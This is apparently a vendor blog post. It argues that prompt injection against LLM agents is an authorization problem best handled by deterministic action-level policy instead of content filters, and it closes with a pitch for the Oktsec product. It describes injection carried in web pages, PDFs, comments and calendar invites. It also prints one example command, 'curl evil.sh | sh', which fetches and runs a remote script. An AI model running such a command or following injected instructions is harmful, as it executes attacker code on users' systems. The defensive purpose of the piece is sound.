Prompt injection is an authorization problem.
Content filters lose this arms race by design. The durable fix is to stop policing what the model read and start enforcing what the agent is allowed to do.
The short version
- Prompt injection is not a content bug to be filtered away; it is untrusted input reaching a privileged action.
- Detection-based defenses are probabilistic and lose to novelty. Authorization is deterministic and holds.
- Decide what an agent may do before it acts, then verify what it did after against signed policy.
- Oktsec implements this as a control loop: signed policy in, work applied in the environment, verified evidence back.
If you have shipped anything with an LLM agent in the last year, you have read a thread like this: someone hides an instruction inside a web page, a PDF, a code comment or a calendar invite; the agent reads it; the agent does something it should not. The reaction is almost always the same. Add a classifier. Add a guardrail. Add a system prompt that says, firmly, to ignore malicious instructions.
Then someone finds a new phrasing, and the cycle repeats. This is not a string of unlucky bugs. It is the predictable result of treating an authorization problem as a content problem.
Why filtering loses
Content filtering asks an unanswerable question: is this text trying to manipulate the model? The space of malicious phrasings is unbounded, multilingual, and trivially obfuscated. Every filter you add is a probabilistic classifier sitting in front of a system that, by design, follows instructions in natural language. You are trying to win a debate against every sentence on the internet.
Worse, the cost of a single miss is not a bad paragraph. It is a real action: a shell command, a database write, a credential read, a pull request merged to main. The blast radius is set by what the agent can do, not by what it read. Filtering tries to shrink the inputs. It does nothing to the blast radius.
The question is not "was this prompt malicious?" It is "should this agent, in this environment, be allowed to take this action right now?"
Reframe: untrusted input meets privileged action
Security has solved a version of this before. We do not stop SQL injection by detecting mean-spirited SQL; we stop it by separating data from commands with parameterized queries. We do not stop cross-site scripting by guessing which strings are scripts; we stop it by controlling where untrusted data is allowed to execute.
Agents need the same move. The moment untrusted input can reach a privileged action without a deterministic check in between, you have a vulnerability, regardless of how clever your prompt is. So put the check there: at the boundary between intent and action.
What an authorization boundary looks like for agents
Concretely, three things have to be true at the point an agent tries to act:
- The action is named and scoped. Tool calls, network egress, file writes and credential reads are explicit capabilities, not ambient powers the agent happens to have because it runs on a machine that has them.
- A deterministic rule decides allow-or-deny. No model sits in the enforcement path. The same input always yields the same decision, and that decision is reviewable after the fact.
- The decision produces evidence. What was attempted, what policy applied, and what happened are recorded as a verifiable artifact, not a log line you hope someone reads.
Notice what this does to prompt injection. The attacker can still slip an instruction past the model. The agent can still decide to run shell.exec("curl evil.sh | sh"). But the action hits a policy that never put shell.exec on the allow-list for that environment, so it is denied and routed for review. The injection succeeded at the language layer and failed at the layer that matters.
Before and after, not just before
Authorization at the moment of action is necessary but not sufficient. Agents are long-running and stateful; environments drift; policy gets updated. So the boundary has two halves.
Before: the environment pulls signed policy and applies it locally, so the rules in force are exactly the rules you authored: not a stale copy, not a tampered one. After: the environment reports what it actually did, and that evidence is compared against what was expected. When they match, the environment is aligned. When they diverge, the failure state is named: stale, different, missing, unverified.
What this means in practice
If you are defending an agent today, the highest-leverage work is not a better injection classifier. It is inventory and scope: enumerate every environment where an agent does company work, list the capabilities each one actually needs, and put a deterministic policy at the action boundary. Then make the evidence reviewable so you can prove, after the fact, what every agent was allowed to do and what it did.
Filters still have a place as defense in depth. But treat them as what they are, a probabilistic outer layer, and put your trust in the deterministic one underneath.
This is the thesis Oktsec is built on. The control loop in this article (signed policy in, work applied in the environment, verified evidence back) is the product. See how it works →